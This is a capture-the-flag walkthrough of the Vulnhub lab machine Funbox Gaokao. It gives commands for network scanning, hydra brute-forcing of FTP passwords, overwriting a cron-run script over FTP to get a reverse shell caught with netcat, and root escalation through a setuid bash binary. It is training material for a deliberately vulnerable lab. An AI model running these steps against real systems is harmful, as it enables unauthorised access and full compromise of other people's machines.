Funbox Gaokao is a machine that the author has intended for beginners. This machine needs a bit of brute force and some knowledge of the FTP protocol. “Funbox Gaokao Walkthrough – Vulnhub – Writeup”
Link to the machine: https://www.vulnhub.com/entry/funbox-gaokao,707/
Twitter handle of the author: https://twitter.com/@0815R2d2
Walkthrough of Hacksudo Series
Identify the target
The first step while working with the vulnhub challenges is to discover the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Then, I scanned the open ports to identify the exposed services on the target.
sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.32
We have got anonymous access to the FTP server, an SSH server, a web server and a mysql server.
Enumerate FTP server
Since we have got anonymous access to the FTP server, I started from there. Since the default ftp client isn’t that good, I would be using lftp later.
ftp 10.0.2.32
There is a banner of the server that gives us a potential user of the machine. Also, it gives us the hostname which doesn’t have any significance for this purpose of walkthrough. Hence, I started bruteforcing the password of the user.
hydra -V -l sky -P /home/kali/rockyou.txt 10.0.2.32 ftp
As you can see, we got the password for the user sky and hence I logged in.
ftp 10.0.2.32
ls -al
pwd
You can see that it is the /home/sky directory of the target machine. Hence, I went one step back to identify the list of other users and found out there are two other users lucy and sarah. Then, I tried bruteforcing the password of sarah which was successful, but it was a rabbithole. There is another rabbit hole, which is the password of sky can login to the mysql server.
Moving forward, there is a file called user.flag which has the following content. Here, I am using the lftp client, because it makes the life easier.
lftp -u sky,_pass_ 10.0.2.32
ls -al
cat user.flag
I got a hint from the user @D4rw1n from Vulnhub discord channel.
We can see that the flag has a shell script and the file has the executable assess for the user sarah. Hence, we might guess that there is a cron job that is run by sarah. Thus, I downloaded the file to my local machine, updated the script and uploaded it to the ftp server.
get user.flag
# update the script
put user.flag
ls -al
You can see that there permissions are intact. However, if you messed up the permissions somehow, you can see that the FTP server has some site commands enabled.
Using these site commands, we can invoke these commands in the server.
Meanwhile, I also listened on the port 4444.
nc -nlvp 4444
After a while, I got the reverse shell.
Then, I proceeded with upgrading the shell. Check the following post on how to do that.
Upgrade to an intelligent reverse shell
However, since the python way didn’t work to get me a PTY shell, I used the following method.
SHELL=/bin/bash script -q /dev/null
Next, when I searched for the suid binaries, I found out that bash has setuid enabled.
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
This means, we can escalate privileges.
Reference: https://gtfobins.github.io/gtfobins/bash/
bash -p
whoami
cd /root
ls -al
cat root.flag